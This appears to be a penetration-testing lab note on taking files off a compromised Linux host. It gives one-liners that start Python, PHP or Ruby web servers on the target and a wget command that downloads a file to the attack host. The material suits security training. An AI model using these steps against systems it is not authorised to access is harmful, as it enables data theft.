Since Linux distributions usually have Python or php installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.

It is possible to stand up a web server using various languages. A compromised Linux machine may not have a web server installed. In such cases, we can use a mini web server. What they perhaps lack in security, they make up for flexibility, as the webroot location and listening ports can quickly be changed.

Linux - Creating a Web Server with

python3 -m http.server  #Python3

python2.7 -m SimpleHTTPServer   #Python2.7

php -S 0.0.0.0:8000    #PHP

ruby -run -ehttpd . -p8000   #Ruby

Download the File from the Target Machine onto the Pwnbox

wget 192.168.49.128:8000/filetotransfer.txt

<aside> 🗒️

When we start a new web server using Python or PHP, it's important to consider that inbound traffic may be blocked. We are transferring a file from our target onto our attack host, but we are not uploading the file.

</aside>